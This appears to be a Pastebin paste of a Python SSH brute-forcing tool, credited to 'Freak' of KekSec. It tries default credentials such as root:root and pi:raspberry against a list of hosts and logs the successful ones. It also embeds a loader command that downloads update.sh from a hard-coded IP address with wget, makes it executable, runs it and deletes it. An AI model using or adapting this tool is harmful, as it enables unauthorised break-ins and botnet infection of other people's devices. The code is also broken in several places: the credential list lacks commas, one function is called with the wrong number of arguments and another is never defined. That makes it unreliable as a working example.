Advertisement
KekSec

SSH Bruter by Freak (LRAB alternative)

Jan 26th, 2018
4,496
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.51 KB | None | 0 0
  1. #!/usr/bin/python
  2. #Phaaaat hax SSH loader by Freak
  3. import sys, re, os, paramiko, socket
  4. from threading import Thread
  5. from time import sleep
  6.  
  7. if len(sys.argv) < 2:
  8.     sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
  9.  
  10. paramiko.util.log_to_file("/dev/null")
  11. rekdevice="cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.82.70.225/update.sh; busybox wget http://80.82.70.225/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send
  12. print "\033[31m"
  13.  
  14. print "S-S-SUUUPER fast SSH bruter by Freak"
  15. print
  16.  
  17. threads = int(raw_input("Threads: "))
  18.  
  19. lines = open(sys.argv[1],"r").readlines()
  20.  
  21. fh = open("vulnz.txt","a+")
  22.  
  23. def chunkify(lst,n):
  24.     return [ lst[i::n] for i in xrange(n) ]
  25.  
  26. running = 0
  27. passwords = [
  28.         "admin:admin"
  29.         "root:root"
  30.         "root:admin"
  31.         "telnet:telnet"
  32.         "guest:guest"
  33.         "admin:admin"
  34.         "admin:1234"
  35.         "pi:raspberry"
  36.         "vagrant:vagrant"
  37.         "ubnt:ubnt"
  38. ]
  39.  
  40. def haxit(username,password,ip,fh):
  41.     for passwd in passwords:
  42.         try:
  43.             port = 22
  44.             ssh = paramiko.SSHClient()
  45.             ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  46.             ssh.connect(ip, port = port, username=passwd.split(":")[0], password=passwd.split(":")[1], timeout=3)
  47.             ssh.close()
  48.             print "Freaks next root ->"+ passwd + ":" + ip
  49.             fh.write(passwd + ":" + ip + "\n")
  50.             fh.flush()      
  51.         except:
  52.             pass
  53.  
  54. def check(chunk, fh):
  55.     global running
  56.     running += 1
  57.     threadID = running
  58.     for login in chunk:
  59.         login = login.replace("DUP ", "")
  60.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  61.         s.settimeout(3)
  62.         try:
  63.             s.connect((login.split(":")[2], 22))
  64.             s.close()
  65.             haxit(login.split(":")[0], login.split(":")[1], login.split(":")[2])
  66.         except:
  67.             pass
  68.     running -= 1
  69.  
  70. lines = map(lambda s: s.strip(), lines) # remove all newlines
  71.  
  72. chunks = chunkify(lines, threads) # make seperate chunk for each thread
  73.  
  74. print "STARTING SCAN AND BRUTE!!!"
  75.  
  76. Thread(target = printStatus, args = ()).start()
  77.  
  78. for thread in xrange(0,threads):
  79.     if thread >= 384:
  80.         sleep(0.2)
  81.     try:
  82.         Thread(target = check, args = (chunks[thread], fh,)).start()
  83.     except:
  84.         pass
  85. print "Scanning... Press enter 3 times to stop."
  86.  
  87. for i in range(0,3):
  88.     raw_input()
  89.  
  90. fh.close()
  91.  
  92. os.popen("kill -9 " + str(os.getpid()))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement